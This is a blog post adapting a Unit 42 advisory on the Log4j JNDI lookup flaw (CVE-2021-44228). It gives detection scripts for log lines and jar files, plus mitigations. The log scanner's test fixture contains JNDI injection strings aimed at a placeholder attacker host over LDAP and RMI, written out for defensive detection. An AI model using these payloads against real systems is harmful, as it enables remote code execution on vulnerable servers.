If I don’t go to hell, who will? If you find this useful, please give it a thumbs up. Ask if you have questions, and point out any mistakes.

Source: Palo Alto Networks Inc, https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/

For our existing services, the scope of impact is mainly the log4j2 dependency pulled in through spring-boot-starter.

Attack method:

Log4j 2.x supports a feature called lookups, which is commonly used to set log4j configuration values flexibly. The official description of lookups is as follows:

"Lookups provide a way to add values to the log4j configuration at arbitrary places. They are a particular type of Plugin that implements the StrLookup interface."

Ordinary users can use this feature to add values to a configuration anywhere, easily and flexibly, using a predefined format. Specifically, when the log method is called in the application, log4j 2.x calls the format method, which checks each log message for the character sequence ${.

If that sequence is present, the lookup method is called on the string that follows ${, and the whole expression is replaced with the value it resolves to. For example, when the log function is called to record the content shown in Figure 1, the strings java:runtime, java:vm and java:os after ${ are passed as arguments to the lookup method and replaced with the corresponding values.

Lookups come in many types, such as JNDI lookups, JVM input argument lookups (JMX), and web lookups. JNDI lookups retrieve variables through JNDI, and they support several protocols for remote lookup, such as LDAP and RMI. If the log contains the string shown in Figure 2, the lookup method is called to resolve the string jndi:logging/context-name.

Since log content is usually exposed to users and attackers can easily control it in many applications, once an attacker controls the string shown in Figure 3 and hosts a malicious Java class on an LDAP server under their control, the lookup method fetches that class from the remote LDAP server and executes it.
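The mechanics described above (the format step finding ${, the lookup prefix selecting a plugin, and the jndi prefix carrying a protocol such as LDAP or RMI) are what a log monitor has to recognise. The following scanner is an added example, not code from the original post or from Unit 42: it walks each line, extracts every complete ${prefix:key} expression (inner expressions included, since lookups may nest), and flags those whose prefix is jndi together with the URL scheme of the name. The sample log lines and the hostname attacker.example are constructed for offline testing.

```python
"""Flag Log4j-style ${...} lookup expressions in log text (added example)."""
import re
from dataclasses import dataclass

# Constructed sample log lines for offline testing; hostnames are placeholders.
SAMPLE_LOG_LINES = [
    "GET /index.html 200 user-agent=Mozilla/5.0",
    "app started on ${java:runtime} / ${java:vm} / ${java:os}",
    "GET /login 401 user-agent=${jndi:ldap://attacker.example/a}",
    "X-Api-Version: ${jndi:rmi://attacker.example/b}",
]


@dataclass(frozen=True)
class LookupHit:
    line_no: int
    expression: str  # the full ${...} text as it appeared in the line
    prefix: str      # lookup plugin name, e.g. "java" or "jndi"
    protocol: str    # for jndi lookups, the URL scheme of the name; else ""


def extract_lookups(text):
    """Return every complete ${...} expression in text, inner ones first.

    A stack of unclosed "${" offsets handles nesting, so that
    "${a:${b:c}}" yields both "${b:c}" and the outer expression.
    """
    found = []
    open_offsets = []
    i = 0
    while i < len(text):
        if text.startswith("${", i):
            open_offsets.append(i)
            i += 2
            continue
        if text[i] == "}" and open_offsets:
            start = open_offsets.pop()
            found.append(text[start:i + 1])
        i += 1
    return found


def classify(expression):
    """Split a ${prefix:key} expression into (prefix, protocol)."""
    body = expression[2:-1]  # strip the leading "${" and trailing "}"
    prefix, _, key = body.partition(":")
    prefix = prefix.strip().lower()
    protocol = ""
    if prefix == "jndi":
        # The JNDI name is a URL such as ldap://host/name; keep its scheme.
        m = re.match(r"\s*([A-Za-z][A-Za-z0-9+.-]*):", key)
        protocol = m.group(1).lower() if m else ""
    return prefix, protocol


def scan_log_lines(lines):
    """Return a LookupHit for every lookup expression found in the lines."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        for expr in extract_lookups(line):
            prefix, protocol = classify(expr)
            hits.append(LookupHit(line_no, expr, prefix, protocol))
    return hits


def jndi_hits(hits):
    """Keep only the hits that would reach the JndiLookup plugin."""
    return [h for h in hits if h.prefix == "jndi"]


if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG_LINES):
        level = "ALERT" if hit.prefix == "jndi" else "info"
        print(f"{level}: line {hit.line_no} prefix={hit.prefix} "
              f"protocol={hit.protocol or '-'} expr={hit.expression}")
```

Run against the constructed lines, the java: lookups on line 2 are reported as informational and the two jndi: lookups on lines 3 and 4 are flagged with protocols ldap and rmi, which matches the outbound protocols the mitigation section below recommends blocking.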

Key terms:

JNDI

Java Naming and Directory Interface (JNDI) is a standard Java naming system interface provided by Sun. JNDI offers a unified client API; administrators map that API onto specific naming services and directory systems by implementing the JNDI Service Provider Interface (SPI) for each access provider, which lets Java applications interact with those naming and directory services.

LDAP

Lightweight Directory Access Protocol (LDAP) is an open, vendor-neutral, industry-standard application protocol that runs over IP and provides access control and maintenance of distributed directory information.

RMI (see www.jianshu.com/p/de85fad05…)

Introduction to RMI

Java RMI (Remote Method Invocation) is a Java API for remote procedure calls (RPC). It can transport serialized Java objects directly and supports distributed garbage collection. Its implementation depends on the Java Virtual Machine (JVM), so it only supports calls from one JVM to another.

Vulnerability detection methods:

The root cause is that the Lookup class provides JNDI lookup access, including to insecure and untrusted third-party services, while the contents of the log are easily controlled by the user. The bug was discovered by a member of the Alibaba Cloud security team (credit: "This issue was discovered by Chen Zhaojun of Alibaba Cloud Security Team."). The bug note also mentions that "LDAP needs to restrict the servers and classes it can access. By default, JNDI should only support the Java, LDAP, and LDAPS protocols."

So there are two basic checks:

  1. First check whether the project references the log4j-core package.
  2. Then check whether the project contains the class org/apache/logging/log4j/core/lookup/JndiLookup.class.
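Both checks can be run over a deployment directory without starting the application. The scanner below is an added example, not code from the original post or from Unit 42: it opens every .jar/.war/.ear under a root, records any log4j-core version it sees in file names, and reports whether org/apache/logging/log4j/core/lookup/JndiLookup.class is present. Because the affected services here pull log4j2 in through spring-boot-starter, the scanner also descends into nested jars such as BOOT-INF/lib/*.jar inside a Spring Boot fat jar, which a plain `unzip -l` of the outer jar would miss. The build_sample_fat_jar and run_demo helpers construct fake jars with dummy class bytes so the example runs offline; the version 2.14.1 and the file names are constructed.

```python
"""Find log4j-core and the JndiLookup class in jars, nested jars included (added example)."""
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass, field

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J_CORE_JAR = re.compile(r"log4j-core-(\d[\w.\-]*)\.jar$")


@dataclass
class JarFinding:
    path: str                                       # outer archive on disk
    log4j_core_versions: list = field(default_factory=list)  # from jar file names
    has_jndi_lookup: bool = False                   # check 2 from the list above


def _scan_zip(zf, finding):
    """Record log4j-core jars and JndiLookup.class, recursing into nested jars."""
    for name in zf.namelist():
        if name == JNDI_LOOKUP_CLASS:
            finding.has_jndi_lookup = True
        m = LOG4J_CORE_JAR.search(name)
        if m:
            finding.log4j_core_versions.append(m.group(1))
        if name.endswith(".jar"):
            # Nested jar, e.g. BOOT-INF/lib/log4j-core-*.jar in a Spring Boot fat jar.
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    _scan_zip(inner, finding)
            except zipfile.BadZipFile:
                continue


def scan_jar(path):
    """Scan one archive on disk and return its JarFinding."""
    finding = JarFinding(path)
    m = LOG4J_CORE_JAR.search(os.path.basename(path))
    if m:  # the archive itself is log4j-core (check 1 from the list above)
        finding.log4j_core_versions.append(m.group(1))
    with zipfile.ZipFile(path) as zf:
        _scan_zip(zf, finding)
    return finding


def scan_tree(root):
    """Scan every .jar/.war/.ear below root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.endswith((".jar", ".war", ".ear")):
                findings.append(scan_jar(os.path.join(dirpath, f)))
    return findings


def build_sample_fat_jar(path, log4j_version="2.14.1", include_jndi_lookup=True):
    """Construct a fake Spring Boot fat jar for offline testing (dummy class bytes)."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as core:
        core.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi_lookup:
            core.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    with zipfile.ZipFile(path, "w") as fat:
        fat.writestr("BOOT-INF/classes/application.properties", b"spring.main.banner-mode=off\n")
        fat.writestr(f"BOOT-INF/lib/log4j-core-{log4j_version}.jar", inner.getvalue())
    return path


def run_demo():
    """Build one unmitigated and one class-removed fat jar, then scan them."""
    tmp = tempfile.mkdtemp(prefix="log4j-scan-")
    build_sample_fat_jar(os.path.join(tmp, "vulnerable-app.jar"), "2.14.1", True)
    build_sample_fat_jar(os.path.join(tmp, "patched-app.jar"), "2.14.1", False)
    return sorted(scan_tree(tmp), key=lambda f: f.path)


if __name__ == "__main__":
    for finding in run_demo():
        status = "JndiLookup.class PRESENT" if finding.has_jndi_lookup else "JndiLookup.class absent"
        print(f"{finding.path}: log4j-core {finding.log4j_core_versions or 'not found'}; {status}")
```

On a real host, call scan_tree on the application directory instead of run_demo. A jar that reports a log4j-core version but no JndiLookup.class is one where the class-removal mitigation from the next section has already been applied; a jar that reports both still needs attention.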

Fixing without releasing a new version:

The basic idea is to

  1. Disable the lookups mechanism or remove the JndiLookup class file
  2. Disable JNDI

Secure version: 2.15.0-RC2

Since the original patch was found to be bypassable, in the interest of applying as many protections against this vulnerability as possible, the following mitigations are also recommended:

  • Block suspicious outbound traffic from the server, such as LDAP and RMI, in the PANW Firewall.

  • Disable JNDI lookups.

    • Set log4j2.formatMsgNoLookups=true
    • Remove the JndiLookup class file from log4j-core and restart the service.
  • Disable JNDI

    • Set spring.jndi.ignore=true

Palo Alto Networks will continue to monitor the situation and update this document with any new findings or information.